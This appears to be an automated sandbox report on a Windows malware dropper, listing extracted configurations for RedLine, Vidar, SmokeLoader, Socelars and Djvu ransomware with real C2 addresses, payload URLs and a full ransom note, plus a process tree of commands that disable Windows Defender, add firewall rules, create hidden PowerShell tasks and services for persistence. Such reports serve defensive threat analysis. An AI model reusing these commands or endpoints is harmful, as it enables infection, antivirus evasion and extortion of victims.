Analysis

  • max time kernel
    116s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    14-03-2022 03:06

General

  • Target

    d66b427dc0af05c8f385a9d008fb0c5ada781423eccb13d8c34880f8b13a1ef7.exe

  • Size

    3.6MB

  • MD5

    524082b7b16ebbcc1eaab6bd3fc0ef3d

  • SHA1

    d7bf726baefbb5b72aceb095af01db0a8ae55df1

  • SHA256

    d66b427dc0af05c8f385a9d008fb0c5ada781423eccb13d8c34880f8b13a1ef7

  • SHA512

    b2f57fda42b70a8815f33cb0e7927f5425b45e3f1424c99a1b28e7fba6d128dd5407ee81417ca9ac417ef9e774a9757fe2bbf543025fe4a7da461e7decf42369

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

vidar

Version

39.9

Botnet

706

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ANINEWONE

C2

zisiarenal.xyz:80

Extracted

Family

redline

Botnet

ruzki000

C2

86.107.197.196:63065

Attributes
  • auth_value

    80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

redline

Botnet

pizzadlyashekera

C2

65.108.101.231:14648

Attributes
  • auth_value

    7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 13 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 47 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 17 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d66b427dc0af05c8f385a9d008fb0c5ada781423eccb13d8c34880f8b13a1ef7.exe
    "C:\Users\Admin\AppData\Local\Temp\d66b427dc0af05c8f385a9d008fb0c5ada781423eccb13d8c34880f8b13a1ef7.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4184
    • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3168
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c zaiqa_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4192
        • C:\Users\Admin\AppData\Local\Temp\7zS850EE5BD\zaiqa_7.exe
          zaiqa_7.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:4116
          • C:\Users\Admin\Documents\S41kk4gZ3ZP6CamfII2CvbZH.exe
            "C:\Users\Admin\Documents\S41kk4gZ3ZP6CamfII2CvbZH.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Drops file in Program Files directory
            PID:812
            • C:\Users\Admin\Documents\Wx8mji1KjLdM1QDONTWZ2Qbs.exe
              "C:\Users\Admin\Documents\Wx8mji1KjLdM1QDONTWZ2Qbs.exe"
              6⤵
              • Executes dropped EXE
              PID:3880
              • C:\Users\Admin\Pictures\Adobe Films\EWgudxHOxO29yc_sVxpD7VVG.exe
                "C:\Users\Admin\Pictures\Adobe Films\EWgudxHOxO29yc_sVxpD7VVG.exe"
                7⤵
                  PID:1120
                • C:\Users\Admin\Pictures\Adobe Films\A8oJpnACXMa31iBs1ygq6acr.exe
                  "C:\Users\Admin\Pictures\Adobe Films\A8oJpnACXMa31iBs1ygq6acr.exe"
                  7⤵
                    PID:2140
                  • C:\Users\Admin\Pictures\Adobe Films\CYEZ6Xi1wPiR2RWlcPh5Pkhx.exe
                    "C:\Users\Admin\Pictures\Adobe Films\CYEZ6Xi1wPiR2RWlcPh5Pkhx.exe"
                    7⤵
                      PID:1248
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 616
                        8⤵
                        • Program crash
                        PID:4716
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 656
                        8⤵
                        • Program crash
                        PID:4836
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 664
                        8⤵
                        • Program crash
                        PID:5744
                    • C:\Users\Admin\Pictures\Adobe Films\p91BVPpeYussmujFcfuzvFdG.exe
                      "C:\Users\Admin\Pictures\Adobe Films\p91BVPpeYussmujFcfuzvFdG.exe"
                      7⤵
                        PID:1812
                      • C:\Users\Admin\Pictures\Adobe Films\qFYQASzzljiTOag2AeWoORsq.exe
                        "C:\Users\Admin\Pictures\Adobe Films\qFYQASzzljiTOag2AeWoORsq.exe"
                        7⤵
                          PID:1832
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                            8⤵
                              PID:6140
                          • C:\Users\Admin\Pictures\Adobe Films\Wsf4vRxH2St8iuRbp7s9RHA3.exe
                            "C:\Users\Admin\Pictures\Adobe Films\Wsf4vRxH2St8iuRbp7s9RHA3.exe"
                            7⤵
                              PID:4324
                              • C:\Users\Admin\AppData\Local\Temp\7zS49DE.tmp\Install.exe
                                .\Install.exe
                                8⤵
                                  PID:4752
                                  • C:\Users\Admin\AppData\Local\Temp\7zS5670.tmp\Install.exe
                                    .\Install.exe /S /site_id "525403"
                                    9⤵
                                      PID:4240
                                • C:\Users\Admin\Pictures\Adobe Films\b0PANA9i7UeZ9nzfFYJeheMA.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\b0PANA9i7UeZ9nzfFYJeheMA.exe"
                                  7⤵
                                    PID:824
                                    • C:\Windows\system32\WerFault.exe
                                      C:\Windows\system32\WerFault.exe -u -p 824 -s 896
                                      8⤵
                                      • Program crash
                                      PID:1060
                                  • C:\Users\Admin\Pictures\Adobe Films\7O721GHWfGzQoMGv9gezfsKc.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\7O721GHWfGzQoMGv9gezfsKc.exe"
                                    7⤵
                                      PID:4700
                                      • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
                                        "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
                                        8⤵
                                          PID:4140
                                          • C:\Users\Admin\AppData\Local\Temp\IEE4BFCK75HDA5F.exe
                                            https://iplogger.org/1QuEf7
                                            9⤵
                                              PID:5688
                                          • C:\Users\Admin\AppData\Local\Temp\ywang.exe
                                            "C:\Users\Admin\AppData\Local\Temp\ywang.exe"
                                            8⤵
                                              PID:5180
                                              • C:\Users\Admin\AppData\Local\Temp\ywang.exe
                                                "C:\Users\Admin\AppData\Local\Temp\ywang.exe" -h
                                                9⤵
                                                  PID:5960
                                              • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
                                                "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
                                                8⤵
                                                  PID:5468
                                                • C:\Users\Admin\AppData\Local\Temp\po50.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\po50.exe"
                                                  8⤵
                                                    PID:5616
                                                  • C:\Users\Admin\AppData\Local\Temp\siww1049.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
                                                    8⤵
                                                      PID:5856
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                  6⤵
                                                  • Creates scheduled task(s)
                                                  PID:4800
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                  6⤵
                                                  • Creates scheduled task(s)
                                                  PID:4900
                                              • C:\Users\Admin\Documents\4yAeiBICYYXkVR0_ZwGaXBM2.exe
                                                "C:\Users\Admin\Documents\4yAeiBICYYXkVR0_ZwGaXBM2.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of SetThreadContext
                                                PID:4504
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                  6⤵
                                                    PID:1400
                                                • C:\Users\Admin\Documents\0oZ6ByCDG31S5mePGkVY5ZZX.exe
                                                  "C:\Users\Admin\Documents\0oZ6ByCDG31S5mePGkVY5ZZX.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2216
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                    6⤵
                                                      PID:4104
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                      6⤵
                                                        PID:6092
                                                    • C:\Users\Admin\Documents\8qVMtR28fdGokyhZ1Nd3wOu0.exe
                                                      "C:\Users\Admin\Documents\8qVMtR28fdGokyhZ1Nd3wOu0.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Suspicious use of SetThreadContext
                                                      PID:4004
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                        6⤵
                                                          PID:3292
                                                      • C:\Users\Admin\Documents\ACGw6cIXepxrDok12N0uIKKB.exe
                                                        "C:\Users\Admin\Documents\ACGw6cIXepxrDok12N0uIKKB.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4724
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 920
                                                          6⤵
                                                          • Program crash
                                                          PID:4116
                                                      • C:\Users\Admin\Documents\fWcsfPY14JVGa8q21pP82_zt.exe
                                                        "C:\Users\Admin\Documents\fWcsfPY14JVGa8q21pP82_zt.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Suspicious use of SetThreadContext
                                                        PID:4680
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                          6⤵
                                                            PID:864
                                                        • C:\Users\Admin\Documents\qJklTeECHRwQF8WVbMh0hXsi.exe
                                                          "C:\Users\Admin\Documents\qJklTeECHRwQF8WVbMh0hXsi.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1196
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c timeout 45
                                                            6⤵
                                                              PID:4636
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout 45
                                                                7⤵
                                                                • Delays execution with timeout.exe
                                                                PID:5052
                                                          • C:\Users\Admin\Documents\AXgA6oMn4G3MiIq9Ss9e_v4S.exe
                                                            "C:\Users\Admin\Documents\AXgA6oMn4G3MiIq9Ss9e_v4S.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:1416
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCF3F.tmp\Install.exe
                                                              .\Install.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4620
                                                              • C:\Users\Admin\AppData\Local\Temp\7zSE6DE.tmp\Install.exe
                                                                .\Install.exe /S /site_id "525403"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3848
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                  8⤵
                                                                    PID:920
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                      9⤵
                                                                        PID:4472
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                          10⤵
                                                                            PID:1292
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                            10⤵
                                                                              PID:2660
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4896
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                            9⤵
                                                                              PID:1732
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                10⤵
                                                                                  PID:5256
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                  10⤵
                                                                                    PID:5588
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /CREATE /TN "gpCfbvOhq" /SC once /ST 03:10:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                8⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:2820
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /run /I /tn "gpCfbvOhq"
                                                                                8⤵
                                                                                  PID:5264
                                                                          • C:\Users\Admin\Documents\ziM4feuUljdJEYpNIeKslseq.exe
                                                                            "C:\Users\Admin\Documents\ziM4feuUljdJEYpNIeKslseq.exe"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Checks computer location settings
                                                                            PID:1868
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fsjsgaib\
                                                                              6⤵
                                                                                PID:2232
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ffmrxqzw.exe" C:\Windows\SysWOW64\fsjsgaib\
                                                                                6⤵
                                                                                  PID:4616
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  "C:\Windows\System32\sc.exe" create fsjsgaib binPath= "C:\Windows\SysWOW64\fsjsgaib\ffmrxqzw.exe /d\"C:\Users\Admin\Documents\ziM4feuUljdJEYpNIeKslseq.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                  6⤵
                                                                                    PID:4028
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    "C:\Windows\System32\sc.exe" description fsjsgaib "wifi internet conection"
                                                                                    6⤵
                                                                                      PID:4744
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      "C:\Windows\System32\sc.exe" start fsjsgaib
                                                                                      6⤵
                                                                                        PID:2876
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                        6⤵
                                                                                          PID:3460
                                                                                        • C:\Users\Admin\gbqmgigb.exe
                                                                                          "C:\Users\Admin\gbqmgigb.exe" /d"C:\Users\Admin\Documents\ziM4feuUljdJEYpNIeKslseq.exe"
                                                                                          6⤵
                                                                                            PID:3856
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oxxvzpwh.exe" C:\Windows\SysWOW64\fsjsgaib\
                                                                                              7⤵
                                                                                                PID:2436
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                "C:\Windows\System32\sc.exe" config fsjsgaib binPath= "C:\Windows\SysWOW64\fsjsgaib\oxxvzpwh.exe /d\"C:\Users\Admin\gbqmgigb.exe\""
                                                                                                7⤵
                                                                                                  PID:4412
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  "C:\Windows\System32\sc.exe" start fsjsgaib
                                                                                                  7⤵
                                                                                                    PID:4184
                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                    7⤵
                                                                                                      PID:3984
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1248
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:3236
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 1224
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:3884
                                                                                                • C:\Users\Admin\Documents\s7fZrQMoQvxs6RE5qEB7V481.exe
                                                                                                  "C:\Users\Admin\Documents\s7fZrQMoQvxs6RE5qEB7V481.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4904
                                                                                                • C:\Users\Admin\Documents\8E7K8APIhJ3pfQfGkrtEgUbj.exe
                                                                                                  "C:\Users\Admin\Documents\8E7K8APIhJ3pfQfGkrtEgUbj.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:408
                                                                                                • C:\Users\Admin\Documents\UaTGjSJKZ9PhbQ5PKhb4DJ2g.exe
                                                                                                  "C:\Users\Admin\Documents\UaTGjSJKZ9PhbQ5PKhb4DJ2g.exe"
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:620
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im UaTGjSJKZ9PhbQ5PKhb4DJ2g.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\UaTGjSJKZ9PhbQ5PKhb4DJ2g.exe" & del C:\ProgramData\*.dll & exit
                                                                                                    6⤵
                                                                                                      PID:5352
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im UaTGjSJKZ9PhbQ5PKhb4DJ2g.exe /f
                                                                                                        7⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5604
                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                        timeout /t 6
                                                                                                        7⤵
                                                                                                        • Delays execution with timeout.exe
                                                                                                        PID:4184
                                                                                                  • C:\Users\Admin\Documents\3NpEf5ULfgxE_pKE_dvHj_Fo.exe
                                                                                                    "C:\Users\Admin\Documents\3NpEf5ULfgxE_pKE_dvHj_Fo.exe"
                                                                                                    5⤵
                                                                                                      PID:4896
                                                                                                      • C:\Users\Admin\Documents\3NpEf5ULfgxE_pKE_dvHj_Fo.exe
                                                                                                        "C:\Users\Admin\Documents\3NpEf5ULfgxE_pKE_dvHj_Fo.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2088
                                                                                                    • C:\Users\Admin\Documents\87MS6dDeZca_yd8nPFI9yuT9.exe
                                                                                                      "C:\Users\Admin\Documents\87MS6dDeZca_yd8nPFI9yuT9.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4860
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 624
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:2716
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 632
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:4472
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 748
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:4836
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 756
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:2876
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 1260
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:3748
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 1300
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:5784
                                                                                                    • C:\Users\Admin\Documents\RDO4Hr41lOMi0HPePObAwK2Z.exe
                                                                                                      "C:\Users\Admin\Documents\RDO4Hr41lOMi0HPePObAwK2Z.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3404
                                                                                                    • C:\Users\Admin\Documents\MhfpK83ct1m2XBj61D_o8q9B.exe
                                                                                                      "C:\Users\Admin\Documents\MhfpK83ct1m2XBj61D_o8q9B.exe"
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2092
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 432
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:1120
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 452
                                                                                                        6⤵
                                                                                                        • Program crash
                                                                                                        PID:1540
                                                                                                    • C:\Users\Admin\Documents\D_uYdesQ3tGBwwD4Fg4IPZpW.exe
                                                                                                      "C:\Users\Admin\Documents\D_uYdesQ3tGBwwD4Fg4IPZpW.exe"
                                                                                                      5⤵
